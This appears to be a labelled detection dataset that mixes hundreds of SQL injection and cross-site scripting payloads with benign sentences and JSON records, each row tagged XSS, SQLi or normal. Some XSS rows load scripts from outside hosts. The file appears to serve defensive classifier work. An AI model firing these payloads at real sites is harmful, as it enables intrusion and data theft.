'rbhe",2,SQLi,10840 "1%' ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( '%' = '",2,SQLi,12700 "-4373%"" ) ) or 5672 = 5188--",2,SQLi,20847 "ABC<div style=""x:\xC2\xA0expression(javascript:alert(1)"">DEF",1,XSS,3432 Select modify.,3,normal,24616 "Select ""My apps & games"" from the menu, then select WhatsApp and tap the Update button.",3,normal,25680 "<IMG SRC=""javascript:javascript:alert(1);"">",1,XSS,7072 "<blink onkeydown=""alert(1)"" contenteditable>test</blink>",1,XSS,4363 "1%' and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and '%' = '",2,SQLi,10640 1' ) ) ) and 7533 = 7533 and ( ( ( 'suzd' like 'suzd,2,SQLi,18179 "select pg_sleep ( 5 ) and ( ( ""%"" = """,2,SQLi,19919 "<script> document.getElementById(%22safe123%22).click=function()+{alert(Safe.get());} document.getElementById(%22safe123%22).click({'type':'click','isTrusted':true}); </script>",1,XSS,273 "1%' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select ( elt ( 1808 = 1808,1 ) ) ) ,0x717a767a71 ) ,8666 ) and '%' = '",2,SQLi,13008 <svg><hgroup onload=alert(1)></hgroup>,1,XSS,8439 "1', ( case when 5204 = 2136 then 1 else null end )",2,SQLi,18440 "1 ) as wype where 6608 = 6608 or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12340 "{""id"":null,""name"":""Darumaka""}",3,normal,27309 <li onpointerdown=alert(1)>XSS</li>,1,XSS,9008 "{""id"":null,""name"":""Totodile""}",3,normal,27173 "<IMG SRC=x onclick=""alert(String.fromCharCode(88,83,83))"">",1,XSS,3812 select ( case when ( 8711 = 6432 ) then 1 else 8711* ( select 8711 from master..sysdatabases ) end ) --,2,SQLi,13943 "-7422"" union all select 9127,9127,9127,9127,9127,9127,9127,9127,9127,9127#",2,SQLi,15799 1' and 3754 = ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 3754 = 3754 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62 ) ) ) from dual ) and 'fbzo' like 'fbzo,2,SQLi,10020 "<acronym oncut=""alert(1)"" contenteditable>test</acronym>",1,XSS,4348 "<style>:target {transform: rotate(180deg);}</style><multicol id=x style=""transition:transform 2s"" ontransitionrun=alert(1)></multicol>",1,XSS,547 select sleep ( 5 ) and ( 'pwpc' = 'pwpc,2,SQLi,19649 The select committee will continue its work over the year.,3,normal,25356 <svg><center onload=alert(1)></center>,1,XSS,8505 "1' ) ) or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 ) = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) and ( ( 'gxgi' = 'gxgi",2,SQLi,11737 "1"" ) as zovk where 4591 = 4591 or 4240 = ( select 4240 from pg_sleep ( 5 ) ) --",2,SQLi,15253 <tr onpointerup=alert(1)>XSS</tr>,1,XSS,9326 "1 ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )",2,SQLi,13761 "{""id"":null,""name"":""main""}",3,normal,27512 1 rlike ( select ( case when ( 8911 = 5301 ) then 1 else 0x28 end ) ) # pmuh,2,SQLi,15544 "<title onmousedown=""alert(1)"">test</title>",1,XSS,7567 "1 union all select null,null,null,null,null,null,null,null#",2,SQLi,17328 "select count ( * ) from generate_series ( 1,5000000 ) and ( ( ( ""uydm"" = ""uydm",2,SQLi,15341 "First, you select a wallpaper platform — monitor or mobile phone — then select the dimensions depending on your device.",3,normal,26191 "( select ( case when ( 1343 = 1343 ) then ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) else 1343 end ) from dual )",2,SQLi,11803 <menuitem onpointerup=alert(1)>XSS</menuitem>,1,XSS,6643 Select the best candidate for the job.,3,normal,24120 <data onpointermove=alert(1)>XSS</data>,1,XSS,8233 "1"" where 2365 = 2365 and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,12675 Where's the hostel?,3,normal,23552 1 ) as gbtj where 8175 = 8175,2,SQLi,20689 %2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-,1,XSS,2985 "1%"" ) ) ) rlike ( select * from ( select ( sleep ( 5 ) ) ) vwyq ) #",2,SQLi,16538 -8922 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) -- krmh,2,SQLi,13433 Select the perfect wedding venue.,3,normal,24406 "<IMG SRC=x ondurationchange=""alert(String.fromCharCode(88,83,83))"">",1,XSS,2669 Where's the condo?,3,normal,23564 "-4325' or make_set ( 9354 = 9354,7185 )",2,SQLi,19631 <i onpointerdown=alert(1)>XSS</i>,1,XSS,9377 Select the best route for your road trip.,3,normal,24119 1' where 5230 = 5230,2,SQLi,21807 "<style>:target {transform: rotate(180deg);}</style><xss id=x style=""transition:transform 10s"" ontransitioncancel=alert(1)></xss>",1,XSS,616 -2411 or ( 8459 = 8459 ) *4906# pxwg,2,SQLi,19969 "select * from users where id = 1 or "".,"" or 1 = 1 -- 1",2,SQLi,17874 <main id=x tabindex=1 onbeforeactivate=alert(1)></main>,1,XSS,4499 """) and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,19450 "Simply add the items you want, select the most appropriate shipping method, then click recalculate.",3,normal,25554 1 ) and ( 3020 = 3020 ) *6703 and ( 9831 = 9831,2,SQLi,18827 "1"" ) where 7452 = 7452",2,SQLi,21500 "<plaintext oncopy=""alert(1)"" contenteditable>test</plaintext>",1,XSS,3296 <article onpointerdown=alert(1)>XSS</article>,1,XSS,6740 "<;STYLE>;li {list-style-image: url("";javascript:alert(&#39;XSS&#39;)"";);}<;/STYLE>;<;UL>;<;LI>;XSS",1,XSS,1502 <ol onpointermove=alert(1)>XSS</ol>,1,XSS,9021 select * from users where id = 1 % ( \ ) or 1 = 1 -- 1,2,SQLi,17929 "First, select the Allow offline mail prompt to start downloading messages.",3,normal,26190 "1%' or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and '%' = '",2,SQLi,15047 "1' ) or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ( 'maln' like 'maln",2,SQLi,11146 "<select draggable=""true"" ondrag=""alert(1)"">test</select>",1,XSS,4234 Select a class to improve your skills.,3,normal,24112 "<base onclick=""alert(1)"">test</base>",1,XSS,8823 ">""><script src = 'http://www.site.com/XSS.js'></script>",1,XSS,4432 "call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) and ""cuzi"" like ""cuzi",2,SQLi,12069 "1' where 8969 = 8969 union all select null,null,null,null,null--",2,SQLi,16798 "{""id"":null,""firstName"":""Janet"",""lastName"":""Swar"",""address"":""2900 4TH AVE, BILLINGS MT 59101"",""city"":""694"",""telephone"":""6371369373""}",3,normal,27434 Where's the hotel?,3,normal,23550 or SLEEP(5)=,2,SQLi,22331 "AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))--",2,SQLi,12206 "<div onmouseout=""alert(1)"">test</div>",1,XSS,8595 "<label onpaste=""alert(1)"" contenteditable>test</label>",1,XSS,4808 It premieres on Netflix and in select theaters in fall.,3,normal,25962 Select trail.,3,normal,24664 "select * from users where id = '1' or 1^ = 1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,13873 Select the main dish.,3,normal,24470 You can also save $50 on select Fire HD 8 Tablet.,3,normal,25106 """ ) ) or sleep ( __TIME__ ) = """,2,SQLi,20402 "1 ) procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select ( case when ( 5840 = 5840 ) then 1 else 0 end ) ) ,0x717a767a71 ) ) ,1 )",2,SQLi,11942 "1"" where 2483 = 2483",2,SQLi,21802 Select gift.,3,normal,23035 "1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' --",2,SQLi,15920 `'><script>\xE2\x80\x8Bjavascript:alert(1)</script>,1,XSS,5321 "{""id"":null,""name"":""Mesprit""}",3,normal,27407 <canvas onpointerdown=alert(1)>XSS</canvas>,1,XSS,7122 "<a href=""\x05javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,2423 1 where 9932 = 9932,2,SQLi,22019 "<html onMouseLeave html onMouseLeave=""javascript:javascript:alert(1)""></html onMouseLeave>",1,XSS,1752 "1 ) ) as cdhd where 2958 = 2958 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11368 "1"" ) ) or sleep ( 5 ) and ( ( ""mcyv"" = ""mcyv",2,SQLi,19116 "1' ) ) ) and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ( ( ( 'wsmq' = 'wsmq",2,SQLi,12278 "{""id"":null,""firstName"":""Rita"",""lastName"":""Leng"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27241 "<style>@keyframes slidein {}</style><picture style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></picture>",1,XSS,340 Select your view.,3,normal,24833 "1'|| ( select 'ymez' from dual where 9870 = 9870 or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,11879 "<style>@keyframes x{}</style><frameset style=""animation-name:x"" onanimationstart=""alert(1)""></frameset>",1,XSS,1343 "{""id"":null,""name"":""somebody symbol""}",3,normal,27009 Please select a wedding theme.,3,normal,24408 "<audio draggable=""true"" ondragstart=""alert(1)"">test</audio>",1,XSS,3642 "-5181"" ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( ""qofp"" = ""qofp",2,SQLi,16737 1' ) where 6408 = 6408,2,SQLi,21551 "<isindex draggable=""true"" ondragleave=""alert(1)"">test</isindex>",1,XSS,3006 "<basefont onclick=""alert(1)"">test</basefont>",1,XSS,6963 <template id=x tabindex=1 onactivate=alert(1)></template>,1,XSS,4092 "-9163"" union all select 3820,3820,3820,3820,3820,3820,3820,3820,3820#",2,SQLi,16338 "1%"" ) and elt ( 7436 = 9874,9874 ) and ( ""%"" = """,2,SQLi,18730 Sort books.,3,normal,23093 Where's your SQL function?,3,normal,23435 -8486%' ) ) ) or 8571 = 8571--,2,SQLi,20607 "1"" where 9973 = 9973 and 2006 = 2006",2,SQLi,19957 <html ontouchmove=alert(1)>,1,XSS,9653 "<map onmousedown=""alert(1)"">test</map>",1,XSS,8366 1' ) as wjty where 2971 = 2971,2,SQLi,20613 """I do not accept the select committee and I will not send my officers for the select committee,"" he said before holding an emergency cabinet meeting on Friday night.",3,normal,26464 "1%"" ) ) and 6414 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ""%"" = """,2,SQLi,12442 Select the best wedding cake flavor.,3,normal,24396 "1' ) and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,13374 "In addition to many other researches besides those here mentioned, he wrote or edited various books on chemistry and chemical technology, including Select Methods of Chemical Analysis, which went through a number of editions; and he also gave a certain amount of time to the investigation of psychic phenomena, endeavouring to effect some measure of correlation between them and ordinary physical laws.",3,normal,26019 Select the perfect gift.,3,normal,22611 declare @s varchar ( 200 ) select @s = 0x77616974 ...,2,SQLi,18047 "<div id=""125""><?xml version=""1.0""?>",1,XSS,9133 "<xss onscrollend=alert(1) style=""display:block;overflow:auto;border:1px dashed;width:500px;height:100px;""><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><span id=x>test</span></xss>",1,XSS,62 "<div draggable=""true"" contenteditable>drag me</div><area ondrop=alert(1) contenteditable>drop here</area>",1,XSS,1242 1' order by 1--,2,SQLi,22176 <command id=x tabindex=1 onfocus=alert(1)></command>,1,XSS,5138 "&lt;IMG SRC=javascript&#058;alert(String&#46;fromCharCode(88,83,83))&gt;",1,XSS,2345 "UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11",2,SQLi,15072 "<div STYLE=""background-image: url(&#1;javascript:document.vulnerable=true;)"">",1,XSS,2122 "<style>@keyframes x{}</style><legend style=""animation-name:x"" onanimationend=""alert(1)""></legend>",1,XSS,1526 <video onpointermove=alert(1)>XSS</video>,1,XSS,7620 "<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><multicol id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></multicol>",1,XSS,155 1'|| ( select 'qtep' where 2572 = 2572 or ( select * from ( select ( sleep ( 5 ) ) ) sddo ) #,2,SQLi,14560 <;IMG SRC=&;#x6A&;#x61&;#x76&;#x61&;#x73&;#x63&;#x72&;#x69&;#x70&;#x74&;#x3A&;#x61&;#x6C&;#x65&;#x72&;#x74&;#x28&;#x27&;#x58&;#x53&;#x53&;#x27&;#x29>;,1,XSS,483 <noframes onpointerover=alert(1)>XSS</noframes>,1,XSS,6124 "1%"" ) ) ) and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and ( ( ( ""%"" = """,2,SQLi,12676 Select the best route for your journey.,3,normal,24100 Where's the cave?,3,normal,23527 "1' ) ) ) or 7552 = ( select count ( * ) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) and ( ( ( 'nqam' = 'nqam",2,SQLi,12136 "-2783' where 1494 = 1494 union all select 1494,1494,1494,1494,1494,1494--",2,SQLi,15874 "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=""javas<![CDATA[cript:alert('XSS');"">",1,XSS,1764 "1"" where 4808 = 4808 union all select null,null,null,null,null,null,null#",2,SQLi,15850 "-9197%"" ) ) ) union all select 1040,1040,1040,1040,1040,1040,1040,1040,1040#",2,SQLi,15531 <svg><param onload=alert(1)></param>,1,XSS,8945 <title onpointermove=alert(1)>XSS</title>,1,XSS,7718 1' where 1844 = 1844,2,SQLi,21823 Where's the perfect place to take a cooking class?,3,normal,23905 Update the software version.,3,normal,22638 <script>location='javascript:alert\x281\x29'</script>,1,XSS,4855 &lt;BGSOUND SRC=&quot;javascript:alert(&apos;XSS&apos;);&quot;&gt;,1,XSS,2713 collate,3,normal,23192 "1"" ) as wmng where 5976 = 5976",2,SQLi,20560 "UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16",2,SQLi,17741 "1%' and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and '%' = '",2,SQLi,11070 Select carefully now.,3,normal,24804 Read about how to select the correct 529 college savings plan.,3,normal,25761 <image2 onpointerleave=alert(1)>XSS</image2>,1,XSS,6822 Select a scent for your perfume.,3,normal,24105 "1"" where 7828 = 7828",2,SQLi,21830 "1"" ) ) as tgwp where 9405 = 9405",2,SQLi,20258 Select exchange.,3,normal,24766 "1' union all select null,null#",2,SQLi,20534 "1' or 9643 = ( select count ( * ) from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) and 'xqkq' = 'xqkq",2,SQLi,13105 admin' or '1'='1'/*,2,SQLi,21905 "AND 1 = utl_inaddr.get_host_address ( ( SELECT DISTINCT ( USERNAME ) FROM ( SELECT DISTINCT ( USERNAME ) , ROWNUM AS LIMIT FROM SYS.ALL_USERS ) WHERE LIMIT = 6 ) ) AND 'i' = 'i",2,SQLi,11579 -3849 ) or 5580 = 3442--,2,SQLi,21203 "select sleep ( 5 ) and ( ""zsjw"" like ""zsjw",2,SQLi,19274 1'+ ( select 'ohdf' where 7878 = 7878 and 5678 = 3277--,2,SQLi,17794 <frameset onpointerleave=alert(1)>XSS</frameset>,1,XSS,5943 "<section draggable=""true"" ondragstart=""alert(1)"">test</section>",1,XSS,3069 "He wrote Practical Sermons (1858; edited by Noah Porter); Lectures on the Moral Government of God (2 vols., 1859), and Essays and Lectures upon Select Topics in Revealed Theology (1859), all published posthumously.",3,normal,26112 "<canvas draggable=""true"" ondragend=""alert(1)"">test</canvas>",1,XSS,3631 "{""id"":null,""firstName"":""Ong"",""lastName"":""Guang"",""address"":""93 NORTH 9TH STREET, BROOKLYN NY 11211"",""city"":""468"",""telephone"":""1008149464""}",3,normal,26893 Select the best option from the list.,3,normal,24069 "<address draggable=""true"" ondragstart=""alert(1)"">test</address>",1,XSS,3030 "<title><img title=""</title><img src onerror=alert(1)>""></title>",1,XSS,2971 "-4785"" ) ) ) or 1 group by concat ( 0x7171706a71, ( select ( case when ( 4232 = 4232 ) then 1 else 0 end ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) having min ( 0 ) #",2,SQLi,11688 <time onpointerup=alert(1)>XSS</time>,1,XSS,8649 "1"" ) as gdcx where 2335 = 2335 and 6969 = ( select 6969 from pg_sleep ( 5 ) ) --",2,SQLi,15180 Insert the car key.,3,normal,22562 "For the Apple News app, editors select stories from reliable sources.",3,normal,26176 Universal Studios Hollywood Halloween Horror Nights runs select evenings Sept.,3,normal,25227 <colgroup id=x tabindex=1 onfocusin=alert(1)></colgroup>,1,XSS,4265 -9191' ) as qtvm where 2838 = 2838 or ( 8459 = 8459 ) *4906--,2,SQLi,17053 "1%' ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15670 <span onpointerleave=alert(1)>XSS</span>,1,XSS,7995 1' ) ) as bewk where 3672 = 3672 or sleep ( 5 ) --,2,SQLi,18482 "union ( select NULL, NULL, NULL, NULL, ( select @@version ) ) --",2,SQLi,16749 "<abbr onmousedown=""alert(1)"">test</abbr>",1,XSS,8044 "1'+ ( select oogh where 1167 = 1167 or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,16012 "<style>@keyframes x{}</style><data style=""animation-name:x"" onanimationstart=""alert(1)""></data>",1,XSS,1624 1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) and ( 'vvxk' = 'vvxk,2,SQLi,12899 Where's the house?,3,normal,23567 1 order by 1--,2,SQLi,22212 <applet onpointerdown=alert(1)>XSS</applet>,1,XSS,7187 Select navigate.,3,normal,24658 "<tr draggable=""true"" ondragend=""alert(1)"">test</tr>",1,XSS,5477 Where's the SQL manual?,3,normal,23407 "select * from users where id = 1 union select 1 $$,version ( ) -- 1",2,SQLi,16482 "<q onmouseenter=""alert(1)"">test</q>",1,XSS,8999 "1%"" and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11396 "<h1 onmouseenter=""alert(1)"">test</h1>",1,XSS,8636 lead,3,normal,23235 -1499 ) as gxfm where 9762 = 9762 or 5989 = 4782--,2,SQLi,18459 "1"" ) ) ) and elt ( 3114 = 3114,sleep ( 5 ) ) #",2,SQLi,18949 "1 where 8949 = 8949 and make_set ( 8403 = 8403,8899 ) --",2,SQLi,17709 HAVING 1=0--,2,SQLi,22294 Let's decide where to go for a leisurely walk.,3,normal,23794 "><script+src=https://api-metrika.yandex.ru/management/v1/counter/1/operation/1?callback=alert""></script>",1,XSS,1306 "<dir onmousedown=""alert(1)"">test</dir>",1,XSS,8431 "<head draggable=""true"" ondragstart=""alert(1)"">test</head>",1,XSS,4035 """></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>",1,XSS,2601 "1' and 5556 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) and 'tqvy' like 'tqvy",2,SQLi,12832 <dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus>,1,XSS,2575 "<isindex onbeforecut=""alert(1)"" contenteditable>test</isindex>",1,XSS,3188 "1%"" ) ) ) and 7533 = 7533 and ( ( ( ""%"" = """,2,SQLi,19176 "<img onbeforecut=""alert(1)"" contenteditable>test</img>",1,XSS,4833 "-5227"" union all select 2666--",2,SQLi,20633 "1%"" ) and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) and ( ""%"" = """,2,SQLi,16110 Select search.,3,normal,24599 "<div id=""133""><!-- `<img/src=xx:xx onerror=alert(133)//--!>//[""'`-->]]>]</div>",1,XSS,2108 "1"" where 1051 = 1051 union all select null--",2,SQLi,19087 "1' ) ) ) union all select null,null,null,null,null,null,null,null,null,null#",2,SQLi,15541 "1"" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ""ymwb"" = ""ymwb",2,SQLi,12904 "-2766%' ) ) union all select 4458,4458,4458,4458,4458--",2,SQLi,17795 "{""id"":null,""firstName"":""Jacqueline"",""lastName"":""Tay"",""address"":""1013 SPRING LANE, SANFORD NC 27330"",""city"":""137"",""telephone"":""3871580367""}",3,normal,27186 Keep one thing in mind for whichever method you select.,3,normal,25926 exec ( @s ),2,SQLi,22404 %22%3e%3cscript%3ealert('XSS')%3c/script%3e,1,XSS,7086 select ( case when ( 7217 = 7631 ) then 7217 else 7217* ( select 7217 from information_schema.character_sets ) end ) #,2,SQLi,13216 "<div id=d><x xmlns=""><iframe onload=javascript:alert(1)""></div> <script>d.innerHTML=d.innerHTML</script>",1,XSS,1281 select ( case when ( 3444 = 8424 ) then 3444 else 3444* ( select 3444 from information_schema.character_sets ) end ) #,2,SQLi,13245 "<style>:target {color: red;}</style><select id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></select>",1,XSS,806 ; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' --,2,SQLi,14620 "1"" ) and elt ( 1889 = 7397,7397 ) and ( ""kuau"" = ""kuau",2,SQLi,17963 "1%"" union all select null--",2,SQLi,20904 "1%"" ) or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --",2,SQLi,11406 "<rtc onbeforecopy=""alert(1)"" contenteditable>test</rtc>",1,XSS,4568 "{""id"":null,""firstName"":""Grasyah"",""lastName"":""Santhchez"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27180 "UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL--",2,SQLi,15382 "<XML SRC=""http://ha.ckers.org/xsstest.xml"" ID=I></XML>",1,XSS,4843 "-1748%"" ) ) ) union all select 2987#",2,SQLi,20002 23 OR 1=1,2,SQLi,22455 Identify columns where needed.,3,normal,23278 "1 ) as qeav where 8127 = 8127 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 4241 = 4241 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,10136 "<th onmouseenter=""alert(1)"">test</th>",1,XSS,8708 "1"" ) as kzuq where 4259 = 4259",2,SQLi,20587 if ( 5316 = 4416 ) select 5316 else drop function vtve--,2,SQLi,17716 "1"" ) ) as tfjh where 1134 = 1134 and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",2,SQLi,13883 <br onpointermove=alert(1)>XSS</br>,1,XSS,9109 "<IFRAME SRC=""javascript:document.vulnerable=true;""></iframe>",1,XSS,3454 1%' ) and 2949 = 4847 and ( '%' = ',2,SQLi,20103 1' ) as znak where 5203 = 5203,2,SQLi,20652 "><script+src=https://api.mixpanel.com/track/?callback=alert(1337)""></script>",1,XSS,2200 "-5313"" ) ) ) union all select 9189,9189,9189,9189,9189,9189,9189,9189--",2,SQLi,16056 The Primary Consideration In The Definition Of A Unit Is To Select That Method Which Permits The Highest Order Of Accuracy In Comparison And Verification.,3,normal,25393 "&lt;IMG SRC=\""jav&#x0A;ascript&#058;alert('XSS');\""&gt;",1,XSS,4427 "<marquee onmouseenter=""alert(1)"">test</marquee>",1,XSS,6152 "select * from generate_series ( 8147,8147,case when ( 8147 = 6336 ) then 1 else 0 end ) limit 1--",2,SQLi,14313 -9446 ) ) as wmrq where 3705 = 3705 union all select 3705#,2,SQLi,17351 "<style>:target {color: red;}</style><center id=x style=""transition:color 10s"" ontransitioncancel=alert(1)></center>",1,XSS,824 "-5509%"" ) ) ) union all select 7066,7066,7066,7066,7066,7066,7066,7066,7066,7066--",2,SQLi,15094 "-1048%"" or 3038 = 3038",2,SQLi,21420 Join band.,3,normal,23038 "<dt oncontextmenu=""alert(1)"">test</dt>",1,XSS,8359 \'; desc users; --,2,SQLi,22034 "1"" ) ) ) and 7153 = 7474--",2,SQLi,20961 "1 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 ) = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,12199 1' waitfor delay '0:0:5' and 'dtej' like 'dtej,2,SQLi,18946 AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i,2,SQLi,15173 "< STYLE=""behavior: url(.htc);"">",1,XSS,9506 end and ( 4610 = 4610,2,SQLi,21622 "{""id"":null,""firstName"":""Loogwah"",""lastName"":""Kanlayanee"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,26969 "I'm going to give a select group of Guardians back their power, but you're not among them.",3,normal,26038 select ( case when ( 8841 = 9675 ) then 8841 else cast ( 1 as int ) / ( select 0 from dual ) end ) from dual--,2,SQLi,13599 "<marquee draggable=""true"" ondragenter=""alert(1)"">test</marquee>",1,XSS,3056 1'+ ( select biqo where 6046 = 6046,2,SQLi,20083 Select a program to watch online.,3,normal,24202 <i id=x tabindex=1 onactivate=alert(1)></i>,1,XSS,7221 <summary onpointermove=alert(1)>XSS</summary>,1,XSS,6725 "<hgroup draggable=""true"" ondragleave=""alert(1)"">test</hgroup>",1,XSS,3302 1' where 7882 = 7882 and 6663 = 4524--,2,SQLi,19718 Where's the makeup artist?,3,normal,23647 <xmp onpointerleave=alert(1)>XSS</xmp>,1,XSS,8522 "1' ) union all select null,null,null,null,null,null,null,null,null--",2,SQLi,16404 "-2718"" or 2724 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 2724 = 2724 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ""xwbf"" = ""xwbf",2,SQLi,10706 "-8667'+ ( select ymmg where 6132 = 6132 union all select 6132,6132,6132,6132,6132,6132,6132,6132#",2,SQLi,14319 ORDER BY 14,2,SQLi,22372 ( select ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 3287 = 3287 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ),2,SQLi,11022 "1' and 3707 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and 'bxjo' like 'bxjo",2,SQLi,12624 "1' ) ) or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c ) ) #",2,SQLi,17240 "1'|| ( select 'vwop' where 8536 = 8536 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",2,SQLi,11295 "{""id"":null,""firstName"":""Sean"",""lastName"":""Choo"",""specialties"":[{""id"":6155,""name"":""Air Defense Artillery (ADA)""}]}",3,normal,27344 1'+ ( select 'jmdl' where 7827 = 7827,2,SQLi,19870 "<table ondblclick=""alert(1)"">test</table>",1,XSS,7646 "select * from users where id = 1 union select .1$_,version ( ) -- 1",2,SQLi,16462 "-2889 ) ) as iqzv where 1786 = 1786 union all select 1786,1786,1786,1786,1786,1786,1786,1786--",2,SQLi,14446 select sleep ( 5 ) and 'beuk' = 'beuk,2,SQLi,19859 Delete the old records.,3,normal,22731 1' ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 